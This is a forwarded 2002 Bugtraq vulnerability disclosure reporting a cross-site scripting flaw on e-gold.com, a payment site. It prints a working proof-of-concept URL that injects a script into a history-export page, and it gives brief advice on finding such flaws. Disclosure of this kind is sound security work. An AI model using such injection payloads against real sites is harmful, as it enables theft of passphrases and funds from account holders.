---------- Forwarded message ----------
Date: 10 Dec 2002 12:50:03 -0000
From: Liu Die Yu
To: bugtraq@securityfocus.com
Subject: XSS flaw found at "https://www.e-gold.com"
i know bugtraq doesn't accept vulnerability on one site, but the following
info is important; please suggest a forum for me to post.
----=======------
XSSatEGOLD-Content-Tech
XSS flaw found at "https://www.e-gold.com"
technically, it's nothing new.
XSS at E-gold is very dangerous. E-gold is one of the most popular way to
do international business. and unlike credit card system, e-gold sent, it
never comes back. there is no refund policy.
so stealing passphrase means stealing real gold.
it's important, so i take it seriously.
[tested]
browser:MSIEv6
time:2002/12/10 UTC+800
[demo]
at
http://www16.brinkster.com/liudieyu/XSSatEGOLD/XSSatEGOLD-MyPage.htm
or
http://clik.to/liudieyu ==>XSSatEGOLD
or
[CODE.URL START]
https://www.e-gold.com/acct/historycsv.asp?
initial=1xxxx"><SCRIPT>s="You_can_NOT_trust_this_page_if_you_got_if_from_a_
link.____by_LiuDieYu_http://clik.to/liudieyu";w=window.open("https://www.e-
gold.com/acct/login.html");setTimeout("w.document.write
(s)",150);</SCRIPT>&startmonth=12&startday=4&startyear=1996&endmonth=12&end
day=4&endyear=2003&paymentsreceived=1&oldsort=tstamp&page=1
[CODE.URL END]
[exp]
technically, there is only one thing important for XSS attackers:
some CGI can only be found when you are logged in, but they can be reached
even if you are not logged in.
of course, the module dealing with logged-in users is different from the
one dealing with un-logged-in users.
so, you have to test in both situations to ensure it's not XSS vulnerable.
[contact]
http://clik.to/liudieyu ==> "how to contact liu die yu" section
[BTW]
this flaw can be found easily with FASX at
http://clik.to/fasx